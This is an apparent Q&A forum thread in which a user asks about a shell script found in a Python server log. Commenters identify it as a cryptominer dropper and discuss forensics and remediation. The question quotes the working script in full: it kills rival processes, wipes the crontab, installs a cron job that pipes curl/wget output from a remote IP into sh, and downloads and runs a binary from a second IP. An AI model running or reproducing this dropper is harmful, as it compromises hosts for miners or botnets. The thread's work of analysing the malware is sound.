# Found this shell script was executed in my python server log. Can anyone tell me it's purpose?

Tags: bash

The code below showed up in my python3 server log, on my Ubuntu 20.04 Linux desktop system.  Is it just my suspicious nature, or was this an attempt to hack my computer?

```
cc=http://31.42.177.123
sys=sysrv005
bit=$(getconf LONG_BIT)

ps aux | grep kthreaddi | grep tmp | awk '{print $2}' | xargs -I % kill -9 %
ps aux | egrep 'sysrv001|sysrv002|sysrv003|sysrv004|network01|network00' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep sysrv | grep -v 0 | awk '{print $2}' | xargs -I % kill -9 %
crontab -r
echo "*/30 * * * * (curl --user-agent curl_cron $cc||wget --user-agent wget_cron -q -O - $cc)|sh" | crontab -

#pkill -9 $sys
get() {
    chattr -i $2; rm -rf $2
    curl --user-agent curl_ldr$bit -fsSL $1 > $2 || wget --user-agent wget_ldr$bit -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));"
    chmod +x $2
}

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
    get 31.210.20.120/sysrvv $sys; ./$sys
fi
```

Comment: IF that was actually executed by a shell (which hopefully your Python code didn't/wouldn't do), your server is compromised -- the `curl | sh` bit in particular is running whatever code the attacker wants, so it may have installed several more rootkits. Wipe the system and start over.

Comment: That said, "please explain this code" questions are generally considered off-topic here by virtue of being "too broad". See [How to handle "explain how ${this code dump} works" questions](https://meta.stackoverflow.com/a/253896/14122) on [meta].

Comment: BTW, if you want to _check_ if it was executed, look at your crontab. Unless of course a secondary rootkit it pulled down hid the crontab entry from view -- that kind of potential trickery is part of why it's unwise to rely on anything a suspect system tells you in evaluating whether it's safe; such evaluations need to be done _from the outside_, mounting the infected host's drives onto a clean box, and not executing any of its tools except via a sandbox. It's a job for folks with actual forensics experience, and ideally a good dose of caution.

Comment: `rm -rf $2` looks dangerous. What is that "my python3 server log"? What generates that log? `sys=sysrv005 ./$sys` - run `find . -name sysrv005` on your server - is the file there?

Comment: @KamilCuk, eh, it's just deleting the old executable in any given position to replace it with a new, infected, downloaded one. So it's just as dangerous as anything else.

Comment: @D.Clifton Execute in your terminal `ps aux | egrep 'sysrv001|sysrv002|sysrv003|sysrv004|network01|network00'` and `ps aux | grep sysrv` (and `ps aux | grep kthreaddi` ?) and see if it's running..

Comment: @KamilCuk, that only works if it didn't replace `ps` with an executable that hides the rest of the rootkit it shipped with from view. (And even _that_ assumes that it didn't install a kernel module that hides the relevant bits from `/proc` as a whole, and thus `ps`/`top`/`htop` etc; there are kernel modules in the wild that do all these things).

Comment: @KamilCuk, ...when I asserted above that the only sure way to tell if a system is infected is to attach its drives to a different, clean host (and ideally also go through a privilege boundary there so a maliciously malformed filesystem can't trigger an arbitrary-code-execution bug in the kernel of the host being used to inspect), I was very, very serious.

Comment: (Sure, it's mostly your more serious / well-funded attackers who will try to attack the REs investigating an event -- but it's not anything like unheard of for a state-level attacker to _pretend to be_ your random cryptominer gang so they get taken less seriously in triage).

Answer (score -1):

Yes it's a Bitcoin Miner.

31.42.177.123/... basically downloads the above shell script, which points to 31.210.20.120 to download the sysrvv file which is a Bitcoin miner.

Comment: That's what it is _today_, when you just checked, for requests from your specific IP address. Maybe tomorrow the payload will be different. Maybe it has 20 different payloads and rotates between them based on who's bidding how much for botnet members. Maybe it has a list of target organizations and gives them a more specialized payload when requests are seen from their IP block. There's really no knowing, which is part of why a question about a remote payload can't be canonically answered (so this should really be a comment, not an answer at all).

Comment: You are correct, could be a huge botnet provider for literally anything.

Comment: Is this a public service or something? Is this an attacker attempt to use the station to mine bitcoins for the attacker or when you mine bitcoing you use that script?

Comment: The hosts probably got compromised by the attacker, who now uses it to distribute malicous malware. see here:

https://www.virustotal.com/gui/file/1dd2c66843fcf5512b4dda518c2d5010edf06ab701f0380777b1b305ce9c98b0/detection